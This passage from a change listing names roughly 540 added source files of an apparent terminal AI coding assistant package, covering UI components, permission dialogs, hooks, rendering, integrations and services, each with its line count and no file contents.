  563. package/src/components/messages/AttachmentMessage.js +418 -0
  564. package/src/components/messages/CollapsedReadSearchContent.js +363 -0
  565. package/src/components/messages/CompactBoundaryMessage.js +19 -0
  566. package/src/components/messages/GroupedToolUseContent.js +37 -0
  567. package/src/components/messages/HighlightedThinkingText.js +165 -0
  568. package/src/components/messages/HookProgressMessage.js +111 -0
  569. package/src/components/messages/PlanApprovalMessage.js +213 -0
  570. package/src/components/messages/RateLimitMessage.js +149 -0
  571. package/src/components/messages/ShutdownMessage.js +124 -0
  572. package/src/components/messages/SnipBoundaryMessage.js +7 -0
  573. package/src/components/messages/SystemAPIErrorMessage.js +136 -0
  574. package/src/components/messages/SystemTextMessage.js +842 -0
  575. package/src/components/messages/TaskAssignmentMessage.js +72 -0
  576. package/src/components/messages/UserAgentNotificationMessage.js +78 -0
  577. package/src/components/messages/UserBashInputMessage.js +52 -0
  578. package/src/components/messages/UserBashOutputMessage.js +55 -0
  579. package/src/components/messages/UserChannelMessage.js +130 -0
  580. package/src/components/messages/UserCommandMessage.js +107 -0
  581. package/src/components/messages/UserCrossSessionMessage.js +11 -0
  582. package/src/components/messages/UserForkBoilerplateMessage.js +11 -0
  583. package/src/components/messages/UserGitHubWebhookMessage.js +12 -0
  584. package/src/components/messages/UserImageMessage.js +54 -0
  585. package/src/components/messages/UserLocalCommandOutputMessage.js +170 -0
  586. package/src/components/messages/UserMemoryInputMessage.js +73 -0
  587. package/src/components/messages/UserPlanMessage.js +38 -0
  588. package/src/components/messages/UserPromptMessage.js +63 -0
  589. package/src/components/messages/UserResourceUpdateMessage.js +102 -0
  590. package/src/components/messages/UserTeammateMessage.js +156 -0
  591. package/src/components/messages/UserTextMessage.js +270 -0
  592. package/src/components/messages/UserToolResultMessage/RejectedPlanMessage.js +28 -0
  593. package/src/components/messages/UserToolResultMessage/RejectedToolUseMessage.js +17 -0
  594. package/src/components/messages/UserToolResultMessage/UserToolCanceledMessage.js +17 -0
  595. package/src/components/messages/UserToolResultMessage/UserToolErrorMessage.js +92 -0
  596. package/src/components/messages/UserToolResultMessage/UserToolRejectMessage.js +74 -0
  597. package/src/components/messages/UserToolResultMessage/UserToolResultMessage.js +84 -0
  598. package/src/components/messages/UserToolResultMessage/UserToolSuccessMessage.js +58 -0
  599. package/src/components/messages/UserToolResultMessage/utils.js +43 -0
  600. package/src/components/messages/nullRenderingAttachments.js +58 -0
  601. package/src/components/messages/teamMemCollapsed.js +142 -0
  602. package/src/components/messages/teamMemSaved.js +16 -0
  603. package/src/components/permissions/AskUserQuestionPermissionRequest/AskUserQuestionPermissionRequest.js +659 -0
  604. package/src/components/permissions/AskUserQuestionPermissionRequest/PreviewBox.js +219 -0
  605. package/src/components/permissions/AskUserQuestionPermissionRequest/PreviewQuestionView.js +227 -0
  606. package/src/components/permissions/AskUserQuestionPermissionRequest/QuestionNavigationBar.js +175 -0
  607. package/src/components/permissions/AskUserQuestionPermissionRequest/QuestionView.js +444 -0
  608. package/src/components/permissions/AskUserQuestionPermissionRequest/SubmitQuestionsView.js +137 -0
  609. package/src/components/permissions/AskUserQuestionPermissionRequest/use-multiple-choice-state.js +100 -0
  610. package/src/components/permissions/BashPermissionRequest/BashPermissionRequest.js +404 -0
  611. package/src/components/permissions/BashPermissionRequest/bashToolUseOptions.js +110 -0
  612. package/src/components/permissions/ComputerUseApproval/ComputerUseApproval.js +449 -0
  613. package/src/components/permissions/EnterPlanModePermissionRequest/EnterPlanModePermissionRequest.js +126 -0
  614. package/src/components/permissions/ExitPlanModePermissionRequest/ExitPlanModePermissionRequest.js +653 -0
  615. package/src/components/permissions/FallbackPermissionRequest.js +349 -0
  616. package/src/components/permissions/FileEditPermissionRequest/FileEditPermissionRequest.js +185 -0
  617. package/src/components/permissions/FilePermissionDialog/FilePermissionDialog.js +108 -0
  618. package/src/components/permissions/FilePermissionDialog/ideDiffConfig.js +13 -0
  619. package/src/components/permissions/FilePermissionDialog/permissionOptions.js +137 -0
  620. package/src/components/permissions/FilePermissionDialog/useFilePermissionDialog.js +131 -0
  621. package/src/components/permissions/FilePermissionDialog/usePermissionHandler.js +86 -0
  622. package/src/components/permissions/FileWritePermissionRequest/FileWritePermissionRequest.js +164 -0
  623. package/src/components/permissions/FileWritePermissionRequest/FileWriteToolDiff.js +79 -0
  624. package/src/components/permissions/FilesystemPermissionRequest/FilesystemPermissionRequest.js +113 -0
  625. package/src/components/permissions/MonitorPermissionRequest/MonitorPermissionRequest.js +7 -0
  626. package/src/components/permissions/NotebookEditPermissionRequest/NotebookEditPermissionRequest.js +164 -0
  627. package/src/components/permissions/NotebookEditPermissionRequest/NotebookEditToolDiff.js +218 -0
  628. package/src/components/permissions/PermissionDecisionDebugInfo.js +467 -0
  629. package/src/components/permissions/PermissionDialog.js +55 -0
  630. package/src/components/permissions/PermissionExplanation.js +269 -0
  631. package/src/components/permissions/PermissionPrompt.js +316 -0
  632. package/src/components/permissions/PermissionRequest.js +159 -0
  633. package/src/components/permissions/PermissionRequestTitle.js +58 -0
  634. package/src/components/permissions/PermissionRuleExplanation.js +110 -0
  635. package/src/components/permissions/PowerShellPermissionRequest/PowerShellPermissionRequest.js +178 -0
  636. package/src/components/permissions/PowerShellPermissionRequest/powershellToolUseOptions.js +73 -0
  637. package/src/components/permissions/ReviewArtifactPermissionRequest/ReviewArtifactPermissionRequest.js +7 -0
  638. package/src/components/permissions/SandboxPermissionRequest.js +162 -0
  639. package/src/components/permissions/SedEditPermissionRequest/SedEditPermissionRequest.js +228 -0
  640. package/src/components/permissions/SkillPermissionRequest/SkillPermissionRequest.js +385 -0
  641. package/src/components/permissions/WebFetchPermissionRequest/WebFetchPermissionRequest.js +259 -0
  642. package/src/components/permissions/WorkerBadge.js +44 -0
  643. package/src/components/permissions/WorkerPendingPermission.js +107 -0
  644. package/src/components/permissions/hooks.js +163 -0
  645. package/src/components/permissions/rules/AddPermissionRules.js +171 -0
  646. package/src/components/permissions/rules/AddWorkspaceDirectory.js +335 -0
  647. package/src/components/permissions/rules/PermissionRuleDescription.js +78 -0
  648. package/src/components/permissions/rules/PermissionRuleInput.js +136 -0
  649. package/src/components/permissions/rules/PermissionRuleList.js +1190 -0
  650. package/src/components/permissions/rules/RecentDenialsTab.js +205 -0
  651. package/src/components/permissions/rules/RemoveWorkspaceDirectory.js +103 -0
  652. package/src/components/permissions/rules/WorkspaceTab.js +133 -0
  653. package/src/components/permissions/shellPermissionHelpers.js +112 -0
  654. package/src/components/permissions/useShellPermissionFeedback.js +108 -0
  655. package/src/components/permissions/utils.js +14 -0
  656. package/src/components/sandbox/SandboxConfigTab.js +48 -0
  657. package/src/components/sandbox/SandboxDependenciesTab.js +123 -0
  658. package/src/components/sandbox/SandboxDoctorSection.js +47 -0
  659. package/src/components/sandbox/SandboxOverridesTab.js +193 -0
  660. package/src/components/sandbox/SandboxSettings.js +297 -0
  661. package/src/components/shell/ExpandShellOutputContext.js +33 -0
  662. package/src/components/shell/OutputLine.js +110 -0
  663. package/src/components/shell/ShellProgressMessage.js +144 -0
  664. package/src/components/shell/ShellTimeDisplay.js +72 -0
  665. package/src/components/skills/SkillsMenu.js +239 -0
  666. package/src/components/tasks/AsyncAgentDetailDialog.js +235 -0
  667. package/src/components/tasks/BackgroundTask.js +364 -0
  668. package/src/components/tasks/BackgroundTaskStatus.js +419 -0
  669. package/src/components/tasks/BackgroundTasksDialog.js +494 -0
  670. package/src/components/tasks/DreamDetailDialog.js +251 -0
  671. package/src/components/tasks/InProcessTeammateDetailDialog.js +275 -0
  672. package/src/components/tasks/MonitorMcpDetailDialog.js +7 -0
  673. package/src/components/tasks/RemoteSessionDetailDialog.js +868 -0
  674. package/src/components/tasks/RemoteSessionProgress.js +249 -0
  675. package/src/components/tasks/ShellDetailDialog.js +403 -0
  676. package/src/components/tasks/ShellProgress.js +77 -0
  677. package/src/components/tasks/WorkflowDetailDialog.js +7 -0
  678. package/src/components/tasks/renderToolActivity.js +29 -0
  679. package/src/components/tasks/taskStatusUtils.js +94 -0
  680. package/src/components/teams/TeamStatus.js +77 -0
  681. package/src/components/teams/TeamsDialog.js +673 -0
  682. package/src/components/ui/OrderedList.js +66 -0
  683. package/src/components/ui/OrderedListItem.js +41 -0
  684. package/src/components/ui/TreeSelect.js +300 -0
  685. package/src/components/wizard/WizardDialogLayout.js +48 -0
  686. package/src/components/wizard/WizardNavigationFooter.js +11 -0
  687. package/src/components/wizard/WizardProvider.js +217 -0
  688. package/src/components/wizard/index.js +4 -0
  689. package/src/components/wizard/useWizard.js +9 -0
  690. package/src/constants/apiLimits.js +81 -0
  691. package/src/constants/betas.js +45 -0
  692. package/src/constants/common.js +29 -0
  693. package/src/constants/cyberRiskInstruction.js +23 -0
  694. package/src/constants/errorIds.js +14 -0
  695. package/src/constants/figures.js +38 -0
  696. package/src/constants/files.js +150 -0
  697. package/src/constants/github-app.js +139 -0
  698. package/src/constants/identity.js +112 -0
  699. package/src/constants/keys.js +10 -0
  700. package/src/constants/messages.js +1 -0
  701. package/src/constants/oauth.js +175 -0
  702. package/src/constants/outputStyles.js +162 -0
  703. package/src/constants/product.js +54 -0
  704. package/src/constants/prompts.js +994 -0
  705. package/src/constants/spinnerVerbs.js +98 -0
  706. package/src/constants/system.js +77 -0
  707. package/src/constants/systemPromptSections.js +39 -0
  708. package/src/constants/toolLimits.js +50 -0
  709. package/src/constants/tools.js +103 -0
  710. package/src/constants/turnCompletionVerbs.js +12 -0
  711. package/src/constants/xml.js +73 -0
  712. package/src/context/QueuedMessageContext.js +51 -0
  713. package/src/context/fpsMetrics.js +22 -0
  714. package/src/context/mailbox.js +35 -0
  715. package/src/context/modalContext.js +34 -0
  716. package/src/context/notifications.js +199 -0
  717. package/src/context/overlayContext.js +149 -0
  718. package/src/context/promptOverlayContext.js +118 -0
  719. package/src/context/stats.js +207 -0
  720. package/src/context/voice.js +74 -0
  721. package/src/context.js +146 -0
  722. package/src/coordinator/coordinatorMode.js +345 -0
  723. package/src/coordinator/workerAgent.js +24 -0
  724. package/src/cost-tracker.js +208 -0
  725. package/src/costHook.js +17 -0
  726. package/src/daemon/main.js +19 -0
  727. package/src/dialogLaunchers.js +77 -0
  728. package/src/entrypoints/agentSdkTypes.js +202 -0
  729. package/src/entrypoints/cli.js +226 -0
  730. package/src/entrypoints/init.js +265 -0
  731. package/src/entrypoints/mcp.js +141 -0
  732. package/src/entrypoints/sandboxTypes.js +112 -0
  733. package/src/entrypoints/sdk/controlSchemas.js +452 -0
  734. package/src/entrypoints/sdk/controlTypes.js +1 -0
  735. package/src/entrypoints/sdk/coreSchemas.js +1331 -0
  736. package/src/entrypoints/sdk/coreTypes.generated.js +3 -0
  737. package/src/entrypoints/sdk/coreTypes.js +49 -0
  738. package/src/entrypoints/sdk/runtimeTypes.js +1 -0
  739. package/src/entrypoints/sdk/sdkUtilityTypes.js +1 -0
  740. package/src/entrypoints/sdk/settingsTypes.generated.js +1 -0
  741. package/src/entrypoints/sdk/toolTypes.js +1 -0
  742. package/src/environment-runner/main.js +8 -0
  743. package/src/history.js +386 -0
  744. package/src/hooks/fileSuggestions.js +635 -0
  745. package/src/hooks/notifs/useAntOrgWarningNotification.js +5 -0
  746. package/src/hooks/notifs/useAutoModeUnavailableNotification.js +47 -0
  747. package/src/hooks/notifs/useCanSwitchToExistingSubscription.js +58 -0
  748. package/src/hooks/notifs/useDeprecationWarningNotification.js +43 -0
  749. package/src/hooks/notifs/useFastModeNotification.js +164 -0
  750. package/src/hooks/notifs/useIDEStatusIndicator.js +174 -0
  751. package/src/hooks/notifs/useInstallMessages.js +27 -0
  752. package/src/hooks/notifs/useLspInitializationNotification.js +144 -0
  753. package/src/hooks/notifs/useMcpConnectivityStatus.js +81 -0
  754. package/src/hooks/notifs/useModelMigrationNotifications.js +53 -0
  755. package/src/hooks/notifs/useNpmDeprecationNotification.js +25 -0
  756. package/src/hooks/notifs/usePluginAutoupdateNotification.js +83 -0
  757. package/src/hooks/notifs/usePluginInstallationStatus.js +128 -0
  758. package/src/hooks/notifs/useRateLimitWarningNotification.js +119 -0
  759. package/src/hooks/notifs/useSettingsErrors.js +64 -0
  760. package/src/hooks/notifs/useStartupNotification.js +33 -0
  761. package/src/hooks/notifs/useTeammateShutdownNotification.js +64 -0
  762. package/src/hooks/renderPlaceholder.js +26 -0
  763. package/src/hooks/toolPermission/PermissionContext.js +211 -0
  764. package/src/hooks/toolPermission/handlers/coordinatorHandler.js +44 -0
  765. package/src/hooks/toolPermission/handlers/interactiveHandler.js +397 -0
  766. package/src/hooks/toolPermission/handlers/swarmWorkerHandler.js +108 -0
  767. package/src/hooks/toolPermission/permissionLogging.js +145 -0
  768. package/src/hooks/unifiedSuggestions.js +130 -0
  769. package/src/hooks/useAfterFirstRender.js +12 -0
  770. package/src/hooks/useApiKeyVerification.js +63 -0
  771. package/src/hooks/useArrowKeyHistory.js +203 -0
  772. package/src/hooks/useAssistantHistory.js +193 -0
  773. package/src/hooks/useAwaySummary.js +105 -0
  774. package/src/hooks/useBackgroundTaskNavigation.js +204 -0
  775. package/src/hooks/useBlink.js +28 -0
  776. package/src/hooks/useCanUseTool.js +193 -0
  777. package/src/hooks/useCancelRequest.js +195 -0
  778. package/src/hooks/useChromeExtensionNotification.js +50 -0
  779. package/src/hooks/useClipboardImageHint.js +59 -0
  780. package/src/hooks/useCommandKeybindings.js +87 -0
  781. package/src/hooks/useCommandQueue.js +10 -0
  782. package/src/hooks/useCopyOnSelect.js +88 -0
  783. package/src/hooks/useDeferredHookMessages.js +43 -0
  784. package/src/hooks/useDiffData.js +69 -0
  785. package/src/hooks/useDiffInIDE.js +252 -0
  786. package/src/hooks/useDirectConnect.js +150 -0
  787. package/src/hooks/useDoublePress.js +44 -0
  788. package/src/hooks/useDynamicConfig.js +17 -0
  789. package/src/hooks/useElapsedTime.js +25 -0
  790. package/src/hooks/useExitOnCtrlCD.js +57 -0
  791. package/src/hooks/useExitOnCtrlCDWithKeybindings.js +17 -0
  792. package/src/hooks/useFileHistorySnapshotInit.js +14 -0
  793. package/src/hooks/useGlobalKeybindings.js +213 -0
  794. package/src/hooks/useHistorySearch.js +241 -0
  795. package/src/hooks/useIDEIntegration.js +56 -0
  796. package/src/hooks/useIdeAtMentioned.js +51 -0
  797. package/src/hooks/useIdeConnectionStatus.js +21 -0
  798. package/src/hooks/useIdeLogging.js +29 -0
  799. package/src/hooks/useIdeSelection.js +106 -0
  800. package/src/hooks/useInboxPoller.js +709 -0
  801. package/src/hooks/useInputBuffer.js +73 -0
  802. package/src/hooks/useIssueFlagBanner.js +115 -0
  803. package/src/hooks/useLogMessages.js +98 -0
  804. package/src/hooks/useLspPluginRecommendation.js +176 -0
  805. package/src/hooks/useMailboxBridge.js +15 -0
  806. package/src/hooks/useMainLoopModel.js +25 -0
  807. package/src/hooks/useManagePlugins.js +261 -0
  808. package/src/hooks/useMemoryUsage.js +28 -0
  809. package/src/hooks/useMergedClients.js +11 -0
  810. package/src/hooks/useMergedCommands.js +10 -0
  811. package/src/hooks/useMergedTools.js +32 -0
  812. package/src/hooks/useMinDisplayTime.js +26 -0
  813. package/src/hooks/useNotifyAfterTimeout.js +51 -0
  814. package/src/hooks/useOfficialMarketplaceNotification.js +47 -0
  815. package/src/hooks/usePasteHandler.js +195 -0
  816. package/src/hooks/usePluginRecommendationBase.js +101 -0
  817. package/src/hooks/usePrStatus.js +91 -0
  818. package/src/hooks/usePromptSuggestion.js +128 -0
  819. package/src/hooks/usePromptsFromClaudeInChrome.js +66 -0
  820. package/src/hooks/useQueueProcessor.js +46 -0
  821. package/src/hooks/useRemoteSession.js +431 -0
  822. package/src/hooks/useReplBridge.js +715 -0
  823. package/src/hooks/useSSHSession.js +167 -0
  824. package/src/hooks/useScheduledTasks.js +104 -0
  825. package/src/hooks/useSearchInput.js +302 -0
  826. package/src/hooks/useSessionBackgrounding.js +132 -0
  827. package/src/hooks/useSettings.js +10 -0
  828. package/src/hooks/useSettingsChange.js +13 -0
  829. package/src/hooks/useSkillImprovementSurvey.js +69 -0
  830. package/src/hooks/useSkillsChange.js +51 -0
  831. package/src/hooks/useSwarmInitialization.js +67 -0
  832. package/src/hooks/useSwarmPermissionPoller.js +215 -0
  833. package/src/hooks/useTaskListWatcher.js +157 -0
  834. package/src/hooks/useTasksV2.js +220 -0
  835. package/src/hooks/useTeammateViewAutoExit.js +55 -0
  836. package/src/hooks/useTeleportResume.js +81 -0
  837. package/src/hooks/useTerminalSize.js +9 -0
  838. package/src/hooks/useTextInput.js +397 -0
  839. package/src/hooks/useThaddeusHintRecommendation.js +117 -0
  840. package/src/hooks/useTimeout.js +10 -0
  841. package/src/hooks/useTurnDiffs.js +160 -0
  842. package/src/hooks/useTypeahead.js +1250 -0
  843. package/src/hooks/useUpdateNotification.js +21 -0
  844. package/src/hooks/useVimInput.js +232 -0
  845. package/src/hooks/useVirtualScroll.js +627 -0
  846. package/src/hooks/useVoice.js +952 -0
  847. package/src/hooks/useVoiceEnabled.js +21 -0
  848. package/src/hooks/useVoiceIntegration.js +629 -0
  849. package/src/infrastructure/audit.js +210 -0
  850. package/src/infrastructure/guardrails.js +513 -0
  851. package/src/infrastructure/index.js +11 -0
  852. package/src/ink/Ansi.js +269 -0
  853. package/src/ink/bidi.js +117 -0
  854. package/src/ink/clearTerminal.js +58 -0
  855. package/src/ink/colorize.js +198 -0
  856. package/src/ink/components/AlternateScreen.js +74 -0
  857. package/src/ink/components/App.js +562 -0
  858. package/src/ink/components/AppContext.js +11 -0
  859. package/src/ink/components/Box.js +155 -0
  860. package/src/ink/components/Button.js +166 -0
  861. package/src/ink/components/ClockContext.js +108 -0
  862. package/src/ink/components/CursorDeclarationContext.js +3 -0
  863. package/src/ink/components/ErrorOverview.js +50 -0
  864. package/src/ink/components/Link.js +34 -0
  865. package/src/ink/components/Newline.js +30 -0
  866. package/src/ink/components/NoSelect.js +57 -0
  867. package/src/ink/components/RawAnsi.js +46 -0
  868. package/src/ink/components/ScrollBox.js +171 -0
  869. package/src/ink/components/Spacer.js +20 -0
  870. package/src/ink/components/StdinContext.js +16 -0
  871. package/src/ink/components/TerminalFocusContext.js +45 -0
  872. package/src/ink/components/TerminalSizeContext.js +3 -0
  873. package/src/ink/components/Text.js +195 -0
  874. package/src/ink/constants.js +2 -0
  875. package/src/ink/dom.js +298 -0
  876. package/src/ink/events/click-event.js +36 -0
  877. package/src/ink/events/dispatcher.js +172 -0
  878. package/src/ink/events/emitter.js +31 -0
  879. package/src/ink/events/event-handlers.js +30 -0
  880. package/src/ink/events/event.js +9 -0
  881. package/src/ink/events/focus-event.js +16 -0
  882. package/src/ink/events/input-event.js +161 -0
  883. package/src/ink/events/keyboard-event.js +46 -0
  884. package/src/ink/events/terminal-event.js +78 -0
  885. package/src/ink/events/terminal-focus-event.js +15 -0
  886. package/src/ink/focus.js +158 -0
  887. package/src/ink/frame.js +30 -0
  888. package/src/ink/get-max-width.js +23 -0
  889. package/src/ink/hit-test.js +113 -0
  890. package/src/ink/hooks/use-animation-frame.js +48 -0
  891. package/src/ink/hooks/use-app.js +7 -0
  892. package/src/ink/hooks/use-declared-cursor.js +60 -0
  893. package/src/ink/hooks/use-input.js +70 -0
  894. package/src/ink/hooks/use-interval.js +54 -0
  895. package/src/ink/hooks/use-search-highlight.js +32 -0
  896. package/src/ink/hooks/use-selection.js +60 -0
  897. package/src/ink/hooks/use-stdin.js +7 -0
  898. package/src/ink/hooks/use-tab-status.js +57 -0
  899. package/src/ink/hooks/use-terminal-focus.js +15 -0
  900. package/src/ink/hooks/use-terminal-title.js +29 -0
  901. package/src/ink/hooks/use-terminal-viewport.js +77 -0
  902. package/src/ink/ink.js +1645 -0
  903. package/src/ink/instances.js +7 -0
  904. package/src/ink/layout/engine.js +4 -0
  905. package/src/ink/layout/geometry.js +61 -0
  906. package/src/ink/layout/node.js +62 -0
  907. package/src/ink/layout/yoga.js +237 -0
  908. package/src/ink/line-width-cache.js +19 -0
  909. package/src/ink/log-update.js +583 -0
  910. package/src/ink/measure-element.js +8 -0
  911. package/src/ink/measure-text.js +35 -0
  912. package/src/ink/node-cache.js +30 -0
  913. package/src/ink/optimizer.js +81 -0
  914. package/src/ink/output.js +556 -0
  915. package/src/ink/parse-keypress.js +695 -0
  916. package/src/ink/reconciler.js +384 -0
  917. package/src/ink/render-border.js +134 -0
  918. package/src/ink/render-node-to-output.js +1216 -0
  919. package/src/ink/render-to-screen.js +171 -0
  920. package/src/ink/renderer.js +129 -0
  921. package/src/ink/root.js +80 -0
  922. package/src/ink/screen.js +1132 -0
  923. package/src/ink/searchHighlight.js +78 -0
  924. package/src/ink/selection.js +792 -0
  925. package/src/ink/squash-text-nodes.js +56 -0
  926. package/src/ink/stringWidth.js +200 -0
  927. package/src/ink/styles.js +299 -0
  928. package/src/ink/supports-hyperlinks.js +40 -0
  929. package/src/ink/tabstops.js +39 -0
  930. package/src/ink/terminal-focus-state.js +35 -0
  931. package/src/ink/terminal-querier.js +173 -0
  932. package/src/ink/terminal.js +208 -0
  933. package/src/ink/termio/ansi.js +70 -0
  934. package/src/ink/termio/csi.js +260 -0
  935. package/src/ink/termio/dec.js +53 -0
  936. package/src/ink/termio/esc.js +55 -0
  937. package/src/ink/termio/osc.js +432 -0
  938. package/src/ink/termio/parser.js +356 -0
  939. package/src/ink/termio/sgr.js +292 -0
  940. package/src/ink/termio/tokenize.js +264 -0
  941. package/src/ink/termio/types.js +55 -0
  942. package/src/ink/termio.js +24 -0
  943. package/src/ink/useTerminalNotification.js +57 -0
  944. package/src/ink/warn.js +10 -0
  945. package/src/ink/widest-line.js +14 -0
  946. package/src/ink/wrap-text.js +54 -0
  947. package/src/ink/wrapAnsi.js +6 -0
  948. package/src/ink.js +50 -0
  949. package/src/integrations/credentialStore.js +176 -0
  950. package/src/integrations/index.js +5 -0
  951. package/src/integrations/integrationManager.js +180 -0
  952. package/src/integrations/providers/BaseProvider.js +180 -0
  953. package/src/integrations/providers/GitHubProvider.js +217 -0
  954. package/src/integrations/providers/GmailProvider.js +204 -0
  955. package/src/integrations/providers/GoogleCalendarProvider.js +113 -0
  956. package/src/integrations/providers/HubSpotProvider.js +159 -0
  957. package/src/integrations/providers/JiraProvider.js +216 -0
  958. package/src/integrations/providers/NotionProvider.js +221 -0
  959. package/src/integrations/providers/QuickBooksProvider.js +176 -0
  960. package/src/integrations/providers/SlackProvider.js +174 -0
  961. package/src/integrations/providers/StripeProvider.js +206 -0
  962. package/src/integrations/providers/TwilioProvider.js +239 -0
  963. package/src/integrations/providers/_template.js +112 -0
  964. package/src/integrations/types.js +7 -0
  965. package/src/interactiveHelpers.js +308 -0
  966. package/src/jobs/classifier.js +6 -0
  967. package/src/keybindings/KeybindingContext.js +184 -0
  968. package/src/keybindings/KeybindingProviderSetup.js +259 -0
  969. package/src/keybindings/defaultBindings.js +333 -0
  970. package/src/keybindings/loadUserBindings.js +393 -0
  971. package/src/keybindings/match.js +111 -0
  972. package/src/keybindings/parser.js +184 -0
  973. package/src/keybindings/reservedShortcuts.js +109 -0
  974. package/src/keybindings/resolver.js +182 -0
  975. package/src/keybindings/schema.js +205 -0
  976. package/src/keybindings/shortcutFormat.js +48 -0
  977. package/src/keybindings/template.js +40 -0
  978. package/src/keybindings/useKeybinding.js +161 -0
  979. package/src/keybindings/useShortcutDisplay.js +43 -0
  980. package/src/keybindings/validate.js +395 -0
  981. package/src/main.js +4128 -0
  982. package/src/memdir/findRelevantMemories.js +99 -0
  983. package/src/memdir/memdir.js +406 -0
  984. package/src/memdir/memoryAge.js +52 -0
  985. package/src/memdir/memoryScan.js +65 -0
  986. package/src/memdir/memoryShapeTelemetry.js +8 -0
  987. package/src/memdir/memoryTypes.js +260 -0
  988. package/src/memdir/paths.js +235 -0
  989. package/src/memdir/teamMemPaths.js +261 -0
  990. package/src/memdir/teamMemPrompts.js +82 -0
  991. package/src/migrations/migrateAutoUpdatesToSettings.js +47 -0
  992. package/src/migrations/migrateBypassPermissionsAcceptedToSettings.js +32 -0
  993. package/src/migrations/migrateEnableAllProjectMcpServersToSettings.js +83 -0
  994. package/src/migrations/migrateFennecToOpus.js +39 -0
  995. package/src/migrations/migrateLegacyOpusToCurrent.js +44 -0
  996. package/src/migrations/migrateOpusToOpus1m.js +31 -0
  997. package/src/migrations/migrateReplBridgeEnabledToRemoteControlAtStartup.js +23 -0
  998. package/src/migrations/migrateSonnet1mToSonnet45.js +38 -0
  999. package/src/migrations/migrateSonnet45ToSonnet46.js +48 -0
  1000. package/src/migrations/resetAutoModeOptInForDefaultOffer.js +47 -0
  1001. package/src/migrations/resetProToOpusDefault.js +46 -0
  1002. package/src/moreright/useMoreRight.js +13 -0
  1003. package/src/native-ts/color-diff/index.js +819 -0
  1004. package/src/native-ts/file-index/index.js +328 -0
  1005. package/src/native-ts/yoga-layout/enums.js +101 -0
  1006. package/src/native-ts/yoga-layout/index.js +2113 -0
  1007. package/src/outputStyles/loadOutputStylesDir.js +71 -0
  1008. package/src/plugins/builtinPlugins.js +132 -0
  1009. package/src/plugins/bundled/index.js +22 -0
  1010. package/src/proactive/index.js +138 -0
  1011. package/src/proactive/useProactive.js +82 -0
  1012. package/src/projectOnboardingState.js +61 -0
  1013. package/src/query/config.js +17 -0
  1014. package/src/query/deps.js +12 -0
  1015. package/src/query/stopHooks.js +332 -0
  1016. package/src/query/tokenBudget.js +49 -0
  1017. package/src/query.js +1264 -0
  1018. package/src/remote/RemoteSessionManager.js +172 -0
  1019. package/src/remote/SessionsWebSocket.js +308 -0
  1020. package/src/remote/remotePermissionBridge.js +70 -0
  1021. package/src/remote/sdkMessageAdapter.js +227 -0
  1022. package/src/replLauncher.js +7 -0
  1023. package/src/schemas/hooks.js +174 -0
  1024. package/src/screens/Doctor.js +580 -0
  1025. package/src/screens/REPL.js +4500 -0
  1026. package/src/screens/ResumeConversation.js +339 -0
  1027. package/src/self-hosted-runner/main.js +8 -0
  1028. package/src/server/backends/dangerousBackend.js +8 -0
  1029. package/src/server/connectHeadless.js +6 -0
  1030. package/src/server/createDirectConnectSession.js +62 -0
  1031. package/src/server/directConnectManager.js +153 -0
  1032. package/src/server/lockfile.js +11 -0
  1033. package/src/server/parseConnectUrl.js +20 -0
  1034. package/src/server/server.js +12 -0
  1035. package/src/server/serverBanner.js +9 -0
  1036. package/src/server/serverLog.js +11 -0
  1037. package/src/server/sessionManager.js +19 -0
  1038. package/src/server/types.js +7 -0
  1039. package/src/services/AgentSummary/agentSummary.js +147 -0
  1040. package/src/services/MagicDocs/magicDocs.js +193 -0
  1041. package/src/services/MagicDocs/prompts.js +110 -0
  1042. package/src/services/PromptSuggestion/promptSuggestion.js +402 -0
  1043. package/src/services/PromptSuggestion/speculation.js +643 -0
  1044. package/src/services/SessionMemory/prompts.js +254 -0
  1045. package/src/services/SessionMemory/sessionMemory.js +358 -0
  1046. package/src/services/SessionMemory/sessionMemoryUtils.js +157 -0
  1047. package/src/services/analytics/config.js +27 -0
  1048. package/src/services/analytics/datadog.js +26 -0
  1049. package/src/services/analytics/firstPartyEventLogger.js +65 -0
  1050. package/src/services/analytics/firstPartyEventLoggingExporter.js +595 -0
  1051. package/src/services/analytics/growthbook.js +103 -0
  1052. package/src/services/analytics/index.js +91 -0
  1053. package/src/services/analytics/metadata.js +696 -0
  1054. package/src/services/analytics/sink.js +19 -0
  1055. package/src/services/analytics/sinkKillswitch.js +19 -0
  1056. package/src/services/api/adminRequests.js +57 -0
  1057. package/src/services/api/bootstrap.js +118 -0
  1058. package/src/services/api/claude.js +2466 -0
  1059. package/src/services/api/client.js +335 -0
  1060. package/src/services/api/dumpPrompts.js +174 -0
  1061. package/src/services/api/emptyUsage.js +20 -0
  1062. package/src/services/api/errorUtils.js +203 -0
  1063. package/src/services/api/errors.js +926 -0
  1064. package/src/services/api/filesApi.js +523 -0
  1065. package/src/services/api/firstTokenDate.js +49 -0
  1066. package/src/services/api/grove.js +44 -0
  1067. package/src/services/api/logging.js +484 -0
  1068. package/src/services/api/metricsOptOut.js +15 -0
  1069. package/src/services/api/overageCreditGrant.js +123 -0
  1070. package/src/services/api/promptCacheBreakDetection.js +510 -0
  1071. package/src/services/api/referral.js +219 -0
  1072. package/src/services/api/sessionIngress.js +358 -0
  1073. package/src/services/api/ultrareviewQuota.js +29 -0
  1074. package/src/services/api/usage.js +31 -0
  1075. package/src/services/api/withRetry.js +587 -0
  1076. package/src/services/api/xai/anthropic-shim.js +885 -0
  1077. package/src/services/api/xai/brightDataSearch.js +161 -0
  1078. package/src/services/api/xai/thaddeus-engine.js +605 -0
  1079. package/src/services/api/xai/xai-client.js +276 -0
  1080. package/src/services/autoDream/autoDream.js +244 -0
  1081. package/src/services/autoDream/config.js +17 -0
  1082. package/src/services/autoDream/consolidationLock.js +122 -0
  1083. package/src/services/autoDream/consolidationPrompt.js +55 -0
  1084. package/src/services/awaySummary.js +61 -0
  1085. package/src/services/claudeAiLimits.js +331 -0
  1086. package/src/services/claudeAiLimitsHook.js +15 -0
  1087. package/src/services/compact/apiMicrocompact.js +97 -0
  1088. package/src/services/compact/autoCompact.js +234 -0
  1089. package/src/services/compact/cachedMCConfig.js +5 -0
  1090. package/src/services/compact/compact.js +1256 -0
  1091. package/src/services/compact/compactWarningHook.js +12 -0
  1092. package/src/services/compact/compactWarningState.js +15 -0
  1093. package/src/services/compact/grouping.js +58 -0
  1094. package/src/services/compact/microCompact.js +414 -0
  1095. package/src/services/compact/postCompactCleanup.js +70 -0
  1096. package/src/services/compact/prompt.js +325 -0
  1097. package/src/services/compact/reactiveCompact.js +20 -0
  1098. package/src/services/compact/sessionMemoryCompact.js +467 -0
  1099. package/src/services/compact/snipCompact.js +23 -0
